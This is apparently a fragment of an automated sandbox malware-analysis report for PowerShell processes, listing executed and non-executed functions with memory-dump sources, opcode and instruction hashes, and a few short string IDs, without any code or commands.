                                                      • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f4ddedcbf873f59c658131e49e4c94018da3e0bfef9cde501eaa88a380d0bd0
                                                      • Instruction ID: 309b7777048094b1b47eafa5b18bf3f528fce19ffd06b1f6c7205978481b864f
                                                      • Opcode Fuzzy Hash: 6f4ddedcbf873f59c658131e49e4c94018da3e0bfef9cde501eaa88a380d0bd0
                                                      • Instruction Fuzzy Hash: 9A410332E0DA454FE7A9EB68A4106B877E1EF65760F0801BBD44AC71C7EB18EC118395
                                                      Function 00007FF848D4E540 Relevance: .1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2101584851.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848d4d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 03bbc927233d0aac95c45b6a37071ddded7d5a874fb0ee7a486337de0f818458
                                                      • Instruction ID: a482a69711e44b7a8a8021c508028424005739722a017d956e00843961ab4a6a
                                                      • Opcode Fuzzy Hash: 03bbc927233d0aac95c45b6a37071ddded7d5a874fb0ee7a486337de0f818458
                                                      • Instruction Fuzzy Hash: D441067080EBC45FE7969B389855A523FF0EF52320F1506DFD088CB1A3D725A84AC792
                                                      Function 00007FF848E69768 Relevance: .1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102306159.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0ae53d682fa59cf790ab9e7b93155fe55911708c96c9ceb2ac9021e85ec1e94
                                                      • Instruction ID: f1f6851b77011ee0fbf67cf1f6868cae6e30d70485143d46cddefb0c0d6956d6
                                                      • Opcode Fuzzy Hash: b0ae53d682fa59cf790ab9e7b93155fe55911708c96c9ceb2ac9021e85ec1e94
                                                      • Instruction Fuzzy Hash: 7A31EA3191CB489FDB5CAB5CA80A6F97BE1FB95720F00422FE449D3251DB71B8568BC2
                                                      Function 00007FF848E6A648 Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102306159.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 99e94d1f054dff47708405bdcf630c92e70820a83873d634da8d91a9b72846af
                                                      • Instruction ID: e0ac93db03c403b810668dca684d593781acddaab69d73135cccca434fd4e7b0
                                                      • Opcode Fuzzy Hash: 99e94d1f054dff47708405bdcf630c92e70820a83873d634da8d91a9b72846af
                                                      • Instruction Fuzzy Hash: F521D43190CA4C8FDB58DF9CD84A7E97BE0EB95321F04426FD04DD3252D674A85ACB91
                                                      Function 00007FF848F340BF Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102739868.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2e1cd0e034c6fee7f62c31556865998f38023e0fa24b0d6123acda7e28542980
                                                      • Instruction ID: e70476ae431a6e3844cee44d95ac4b7c8f59ae036623a29d2edb996ccf7e2655
                                                      • Opcode Fuzzy Hash: 2e1cd0e034c6fee7f62c31556865998f38023e0fa24b0d6123acda7e28542980
                                                      • Instruction Fuzzy Hash: 6721BD32E1DD874FE7ABBB58545117466E1FF75290F4901BAC01EC72E6CF18EC048649
                                                      Function 00007FF848E6A065 Relevance: .1, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102306159.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b115eb38147ff3f4fd54d74f748bbddba20c0dd68084f1251f2db3c553ba4043
                                                      • Instruction ID: d5f21f2d812fe11539fd1d6b5e443562e5306e809a22cdc604c53816be8e9668
                                                      • Opcode Fuzzy Hash: b115eb38147ff3f4fd54d74f748bbddba20c0dd68084f1251f2db3c553ba4043
                                                      • Instruction Fuzzy Hash: 6A21C372C0D9854FE759EB1898A64E5BBA0FF12345F4800BBC05A9A093EF367496CB45
                                                      Function 00007FF848F343BC Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102739868.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75be6dbd096c74b3cb3ddc7f1259aec944f5e0af8431928ff69ecdd9ee96c784
                                                      • Instruction ID: 228b1783af51e4fefe6646cbcf898b90dbd45e3c2684bf74d3dfc866dc49f8d9
                                                      • Opcode Fuzzy Hash: 75be6dbd096c74b3cb3ddc7f1259aec944f5e0af8431928ff69ecdd9ee96c784
                                                      • Instruction Fuzzy Hash: CB11E032D0E9464FE6A4EB6894505B477E0FF65360B4900BAD01DC71D6DB18AC608395
                                                      Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102306159.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45

                                                      Non-executed Functions

                                                      Function 00007FF848E68995 Relevance: 5.1, Strings: 4, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102306159.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^$N_^$N_^$N_^
                                                      • API String ID: 0-3900292545
                                                      • Opcode ID: ef2f1bd44cd5649d467fb61ccbb4a951a8d6c051991ba2dedce42d7d886be6fd
                                                      • Instruction ID: ea0bdafe5121204721c42235b0c97c90415a6bca11e6f7cd4dab81289a97034d
                                                      • Opcode Fuzzy Hash: ef2f1bd44cd5649d467fb61ccbb4a951a8d6c051991ba2dedce42d7d886be6fd
                                                      • Instruction Fuzzy Hash: 7D41B7A390E6D25FE38697285C750A57FA0FF12398F4D00FBC5889F083EA2974079356
                                                      Function 00007FF848E68BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.2102306159.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^4$N_^7$N_^F$N_^J
                                                      • API String ID: 0-3508309026
                                                      • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                      • Instruction ID: f18af481f557b0c005d2f7b16879bad207cd7bf6b81cc1df4859641e2e7b9136
                                                      • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                      • Instruction Fuzzy Hash: 29213BF76494257ED3097BBCFC145E93B40EF942B4B4941B2D298CF143EA1470868AD6

                                                      Executed Functions

                                                      Function 00007FF848F66605 Relevance: .4, Instructions: 438COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2217991691.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848f60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1607d803b710ced3e3517946b4ad72921b25d1e9898af71d3f4cde1b558a66c0
                                                      • Instruction ID: cfbc735d44c57295f6ced82b0969b0f5f7da470ddde13afbff424548f91d2e27
                                                      • Opcode Fuzzy Hash: 1607d803b710ced3e3517946b4ad72921b25d1e9898af71d3f4cde1b558a66c0
                                                      • Instruction Fuzzy Hash: BBD13531D0EA8A5FE795AB3858145B5BBE0EF163A4F1802FAD44DDB0D3EA1CAC06C355
                                                      Function 00007FF848E9A0D4 Relevance: .3, Instructions: 269COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2209081780.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6217272cb15a9cc0d0840e6921384573461d529ba351e98512a8ab70473658a1
                                                      • Instruction ID: f2e415a5e5585313183c2123b0c3815d5b72f0b3e4f26b8c20c54ef4c76a782b
                                                      • Opcode Fuzzy Hash: 6217272cb15a9cc0d0840e6921384573461d529ba351e98512a8ab70473658a1
                                                      • Instruction Fuzzy Hash: AB21BEA694E7C54FD703AB78AC650D43FB0EF53258B0D01F7D488CB0A3EA184849C7A6
                                                      Function 00007FF848E9A9E8 Relevance: .2, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2209081780.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38e5a17a0e1a2ba13043a3e440b6885a738699ff1567f708af680505fd7ad367
                                                      • Instruction ID: f16ca6f604fe0011650aeda977e21408afa5b53b31b4036483de02629940e1ae
                                                      • Opcode Fuzzy Hash: 38e5a17a0e1a2ba13043a3e440b6885a738699ff1567f708af680505fd7ad367
                                                      • Instruction Fuzzy Hash: 96610932A0DB864FE349E62C98D55A47BE1FF5629CB1801BEC089C7193FE66A847C705
                                                      Function 00007FF848E99770 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2209081780.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a702ee9ba7f24ff51947f9e2c294a022447ad9941646a9c96394fca6505eea48
                                                      • Instruction ID: 3b7c05c21532edce7c49368503acfb7e67ec780b273626c51a6eeca8cac8214d
                                                      • Opcode Fuzzy Hash: a702ee9ba7f24ff51947f9e2c294a022447ad9941646a9c96394fca6505eea48
                                                      • Instruction Fuzzy Hash: 6041E73191CB888FDB19AB5CAC066F97BE0FB95711F04416FE449D3252CA70A856CB86
                                                      Function 00007FF848D7E7E0 Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2207815397.00007FF848D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D7D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d7d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f1eaf6a0fc848f22d1a995af34cbd48ff46d142824167f5bab09e5669928050
                                                      • Instruction ID: c5d860ac8736884851930b435244f1da51d94f80ae1a0056ee8293cb202fa5e8
                                                      • Opcode Fuzzy Hash: 9f1eaf6a0fc848f22d1a995af34cbd48ff46d142824167f5bab09e5669928050
                                                      • Instruction Fuzzy Hash: 67412A3080EBC44FE7569B389845A527FF0EF57360F1506EFD088CB1A3D629A84AC792
                                                      Function 00007FF848E9A64C Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2209081780.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94d082be479755cb352896a936316de730fa642f0698aac1a0e3c100cc19bf5e
                                                      • Instruction ID: 692a22d558c463eef8eb616f89330bd07f5157939b5f8f61734b92d48ef7a22d
                                                      • Opcode Fuzzy Hash: 94d082be479755cb352896a936316de730fa642f0698aac1a0e3c100cc19bf5e
                                                      • Instruction Fuzzy Hash: F221F83190CB8C8FEB59DBAC984A7E97FE0EF96321F04416BD048C3152DA74945ACB92
                                                      Function 00007FF848E933B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2209081780.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                      • Instruction ID: 29c1cfa6bac51b81d075f13f06edf054ad2643bd55ff8ec3c5d015a1cc12a693
                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                      • Instruction Fuzzy Hash: 6C01677115CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45
                                                      Function 00007FF848F6414D Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2217991691.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848f60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 71bea96e20d1136442d04e94981c70d55f5fb00fdd403a3a88dc62751eb4506f
                                                      • Instruction ID: 90b7095918d659a3211bb3256257cd868c65e331149e7aacc68e633695b43171
                                                      • Opcode Fuzzy Hash: 71bea96e20d1136442d04e94981c70d55f5fb00fdd403a3a88dc62751eb4506f
                                                      • Instruction Fuzzy Hash: 23F09A32A0D5058FD759FB0CE4008A873E0FF64360B1100BAE11DC71A3DB26EC418748
                                                      Function 00007FF848F64400 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2217991691.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848f60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d70889886ea6ca3d699698054f071c41bf146ed58d3acadf36ad9652b6067575
                                                      • Instruction ID: 651e81d3f6134a096cb505f2786dbb487f5cd9f5cb90b08dad7252fba7b74d65
                                                      • Opcode Fuzzy Hash: d70889886ea6ca3d699698054f071c41bf146ed58d3acadf36ad9652b6067575
                                                      • Instruction Fuzzy Hash: 00F0B832A0D5448FE799FB0CE4428A8B7F0FF44320B1100F6E10DCB0A3DB2AAC618758
                                                      Function 00007FF848F641D1 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2217991691.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848f60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                      • Instruction ID: 478f6b567d414c0c56ab44598f4de9510e26b0690043c0ae5f8f52ac250b5652
                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                      • Instruction Fuzzy Hash: E9E01A31B0C8088FDA69EB0CE0409E973E1FBA8361B1112B7D14ED75A1CB22EC528B84

                                                      Non-executed Functions

                                                      Function 00007FF848E98BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2209081780.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e90000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                      • API String ID: 0-2350917820
                                                      • Opcode ID: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                                      • Instruction ID: 444569eb3d96cba44d8e31ac74dbc91df50d930669615525f43429644e5a31e4
                                                      • Opcode Fuzzy Hash: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                                      • Instruction Fuzzy Hash: D621F6F3A889157ECA0A36BDF8415E87791EF543B874952F3E018DF113DE24A48B8A94

                                                      Executed Functions

                                                      Function 00007FF848E6BC1A Relevance: 1.9, Strings: 1, Instructions: 668COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E69000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E69000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e69000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: US_H
                                                      • API String ID: 0-4131993692
                                                      • Opcode ID: 50c930b5b8d99e058b4f0a12b5955c6718248c38f85eb414235833fb648ff833
                                                      • Instruction ID: 7d7f240ebcf011c649c3f74276f31f4cb6c6e5ac1efbe426918660e66dcfd3f8
                                                      • Opcode Fuzzy Hash: 50c930b5b8d99e058b4f0a12b5955c6718248c38f85eb414235833fb648ff833
                                                      • Instruction Fuzzy Hash: DA22D330A1CA498FDB88EF1CC485AA9B7E1FFA9350F544179D44AD7296CB35F842CB81
                                                      Function 00007FF848F36605 Relevance: .4, Instructions: 437COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370790689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c030c2f1116660fa409f410ac00026cd62c036df22eb4b989c2c644539726324
                                                      • Instruction ID: c736ecfb12d687c1f8bc4971b63d21bc61815be51414783679f81bdbe496848c
                                                      • Opcode Fuzzy Hash: c030c2f1116660fa409f410ac00026cd62c036df22eb4b989c2c644539726324
                                                      • Instruction Fuzzy Hash: 06D13231D0EA8A5FEB99AB2858155B5BBE0EF0A394F1801FBD44DCB0D3EE1CA805C355
                                                      Function 00007FF848E69EF5 Relevance: .2, Instructions: 233COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E69000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E69000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e69000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bd709ebaa430b7032c127c07c5274f2ab3c494762d5810de9a58cde996a322d
                                                      • Instruction ID: 2a09a961344201bc447773adc948e3145e9c03892a5a5ed4fd34c38d1ad77cd1
                                                      • Opcode Fuzzy Hash: 0bd709ebaa430b7032c127c07c5274f2ab3c494762d5810de9a58cde996a322d
                                                      • Instruction Fuzzy Hash: 66710762D0D9D55FE346EB6C98660F47B60FF123A8F4800FBC1898B093EE25245A8796
                                                      Function 00007FF848E696FA Relevance: .2, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E69000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E69000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e69000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4a2ce60bb5d0c03f7018a5b38719e38ce7a83f9e0fe87bd82eba495a86bc281
                                                      • Instruction ID: f636d5e3b6d7cd6f74f92129dd83ae18c18286b80709317c05895911767092a8
                                                      • Opcode Fuzzy Hash: a4a2ce60bb5d0c03f7018a5b38719e38ce7a83f9e0fe87bd82eba495a86bc281
                                                      • Instruction Fuzzy Hash: 6D512671D0CB899FE74AAB28A80A5B87BE0FF55720F44417FD05993293DB24B806C786
                                                      Function 00007FF848E69FC8 Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E69000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E69000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e69000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79e752e5dc50afe12d15ec31969be9a3d0b0835d5fff41ee9462f3262119af94
                                                      • Instruction ID: 895abd22bad4de83180c1749d11e77ddbef77c23f61a39e642b9c204b1823190
                                                      • Opcode Fuzzy Hash: 79e752e5dc50afe12d15ec31969be9a3d0b0835d5fff41ee9462f3262119af94
                                                      • Instruction Fuzzy Hash: EF410563D0D9D14FE356EB2898660F47BA0FF12394F4800FFC1898B093EE25689AC755
                                                      Function 00007FF848D4ED40 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2369069767.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848d4d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd662a5b21e150267444f73f0d410c9ad9b87a596f3c2b2263c647e4140da0a9
                                                      • Instruction ID: 5222e5a7a807e8a689ef6b6655a83694c223e3221da2349e7a4c0967071d9dbf
                                                      • Opcode Fuzzy Hash: bd662a5b21e150267444f73f0d410c9ad9b87a596f3c2b2263c647e4140da0a9
                                                      • Instruction Fuzzy Hash: D241E63080EBC45FE7969B299845A523FF0EF57360F1905DFD088CB1A3D729A84AC792
                                                      Function 00007FF848E6A6F6 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E69000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E69000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e69000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53936c5ce51a970e74428c518fa79f63937e144569da077a3e4426e788008ad6
                                                      • Instruction ID: 160c51571a161ce501255508d94f3b0b5a1eb9d8708befecf39a3d88556c0661
                                                      • Opcode Fuzzy Hash: 53936c5ce51a970e74428c518fa79f63937e144569da077a3e4426e788008ad6
                                                      • Instruction Fuzzy Hash: DA21027190CA4C8FEB58DFAC984A7E9BBF0EB96321F04816FD448C7112D670A45ACB91
                                                      Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e60000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                                      Function 00007FF848E6BE58 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370069811.00007FF848E69000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E69000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848e69000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165d3e0845884f4947fcec56a12b42b6e29f3a24ca8910dd5c394a71702286e5
                                                      • Instruction ID: bcc221e6a9dbff841ad2ab919ea6d2139be11ecc94d010c2c1faf8824bacb49b
                                                      • Opcode Fuzzy Hash: 165d3e0845884f4947fcec56a12b42b6e29f3a24ca8910dd5c394a71702286e5
                                                      • Instruction Fuzzy Hash: 0DF0373275C6044FDB4CAA1CF4429B5B3D1E795320F10016EE48BC3696D927F8468685
                                                      Function 00007FF848F3414D Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370790689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848f30000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4080bff90b26d4be5cc79e17ed69cf2c02d84f6d11d5e06516c5d87121ce9cfe
                                                      • Instruction ID: 06b834b9a282542735f939a296e467ca2a3128cf3c58affef08d5261670e5284
                                                      • Opcode Fuzzy Hash: 4080bff90b26d4be5cc79e17ed69cf2c02d84f6d11d5e06516c5d87121ce9cfe
                                                      • Instruction Fuzzy Hash: DAF09A32A0D9058FD75AFB4CE4008A873E0FF64360B1100BBE11DC71A3DB26EC408748
                                                      Function 00007FF848F34400 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2370790689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
